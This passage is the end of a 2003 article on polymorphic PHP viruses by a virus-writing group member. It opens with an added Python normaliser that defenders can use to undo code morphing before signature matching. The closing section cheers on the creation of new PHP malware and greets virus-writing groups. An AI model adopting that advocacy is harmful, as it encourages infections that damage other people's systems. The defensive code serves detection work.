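The defender's answer to the trash engine, the variable renamer, the number changer and the alias swapping above is normalisation before signature matching: fold constant arithmetic back to plain numbers, map alias calls to one canonical name, drop comment-only lines and dead literal assignments, and alpha-rename variables in order of appearance. This is an added example, not the article's code; the alias table uses only the entries from the list above I am certain are plain aliases, and the morphed snippet is constructed.

```python
import re

# Canonical names for the aliases listed above (only those I am sure are
# plain aliases; close, dir, rewind and magic_quotes_runtime are left out).
ALIASES = {
    "chop": "rtrim", "die": "exit", "doubleval": "floatval", "fputs": "fwrite",
    "ini_alter": "ini_set", "is_double": "is_float", "is_integer": "is_int",
    "is_long": "is_int", "is_real": "is_float", "is_writeable": "is_writable",
    "join": "implode", "pos": "current", "show_source": "highlight_file",
    "sizeof": "count", "strchr": "strstr",
}
ALIAS_RX = re.compile(r"\b(" + "|".join(map(re.escape, ALIASES)) + r")\s*\(")
# innermost "(int op int)" that is not a function call's argument list
FOLD_RX = re.compile(r"(?<![\w$])\(\s*(-?\d+)\s*([+\-*/])\s*(-?\d+)\s*\)")
COMMENT_LINE = re.compile(r"^\s*//")
LITERAL_ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*(?:'[^']*'|-?\d+)\s*;\s*$")
VAR_RX = re.compile(r"\$(\w+)")


def fold_numbers(src: str) -> str:
    """Collapse constant arithmetic, e.g. ((15+5)-(4+6)) -> 10, inside out."""
    def fold(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if op == "+":
            return str(a + b)
        if op == "-":
            return str(a - b)
        if op == "*":
            return str(a * b)
        if b != 0 and a % b == 0:   # only exact division, as the engine emits
            return str(a // b)
        return m.group(0)
    while True:
        folded = FOLD_RX.sub(fold, src)
        if folded == src:
            return src
        src = folded


def canonicalize_aliases(src: str) -> str:
    """Rewrite alias calls such as sizeof( and join( to the canonical name."""
    return ALIAS_RX.sub(lambda m: ALIASES[m.group(1)] + "(", src)


def strip_junk(src: str) -> str:
    """Drop comment-only lines and literal assignments to variables that
    occur nowhere else, the two kinds of trash the engine above inserts."""
    uses = {}
    for name in VAR_RX.findall(src):
        uses[name] = uses.get(name, 0) + 1
    kept = []
    for line in src.splitlines():
        if COMMENT_LINE.match(line):
            continue
        m = LITERAL_ASSIGN.match(line)
        if m and uses.get(m.group(1), 0) == 1:
            continue
        kept.append(line)
    return "\n".join(kept)


def rename_variables(src: str) -> str:
    """Alpha-rename user variables to $v1, $v2, ... in order of appearance,
    leaving $this and the underscore-prefixed superglobals alone."""
    names = {}
    def sub(m):
        name = m.group(1)
        if name == "this" or name.startswith("_"):
            return m.group(0)
        names.setdefault(name, "v%d" % (len(names) + 1))
        return "$" + names[name]
    return VAR_RX.sub(sub, src)


def normalize(src: str) -> str:
    """Full pipeline: fold numbers, canonical names, drop trash, rename."""
    return rename_variables(strip_junk(canonicalize_aliases(fold_numbers(src))))


# Constructed sample: a morphed snippet with a junk comment, a dead literal,
# an arithmetic-wrapped constant and an alias call.
MORPHED = """<?php
// zqfkl
$zz='aa';
$len=(14-4);
$parts=join(',', $arr);
echo $len;
?>"""

if __name__ == "__main__":
    print(normalize(MORPHED))
```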

5) Last Words

Coming to an end I want to say that I had really much fun discovering this language, and I also hope that you learned some things. I hope that I will see many new and good PHP malware in the near future. If I don't see any, I know that I worked 2-3 months for nothing. :) But let's see it positively: now it's easy to write strong viruses for this language, because the techniques are already discovered. At this point I want to thank MaskBits/VXI for making the first PHP malware, called PHP.Pirus, which was released in 29a#5. This inspired me to write this article, because I found out that the current PHP viruses are not at the point where you can say: "It's perfect, we can't make it better." :). Another guy I want to thank is SnakeByte, because of his articles about Perl poly/EPO/encryption in 29a#6. They helped me in some parts of this article. Greets go also to Kefi, who also wrote a PHP polymorphic virus, which I haven't seen so far. Knowing that made me very active in writing this article :). Now I want to send some greets and thanks out to the world, because I think I have said everything that is important:

PhileT0aster and the rest of the rRlf-gang ;), jackie for being something like an idol for me, SlageHammer & Knowdeth - the most friendly VX guys I know :), VirusBuster - for answering my stupid questions every time, Vorgon - for trying to teach me assembler :D, Toro - for helping me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - for being a great guy, VorteX & Worf for being the first guys who helped me in the VX world :), VxF & Metal for the great fun in IRC :), Doctor Rave for some great ideas you gave me, prizzy for the nice email you wrote, herm1t for hosting my homepage, sinocred for hating the '<SPTH> hi' :D, PanoiX for being a cool guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte for cool talks in IRC (unfortunately we have nearly no contact recently) and many other cool individuals I know... :) I also want to send out some group greets: greets to rRlf (of course :D), 29A, iKx, SLAM, TKT, MIONS, Whackerz and every other more or less active virus-writing group!

                                                        - - - - - - - - - - - - - - -
                                                          Second Part To Hell/[rRlf]  
                                                          www.spth.de.vu
                                                          written from oct-november 2003
                                                          Austria
                                                        - - - - - - - - - - - - - - - 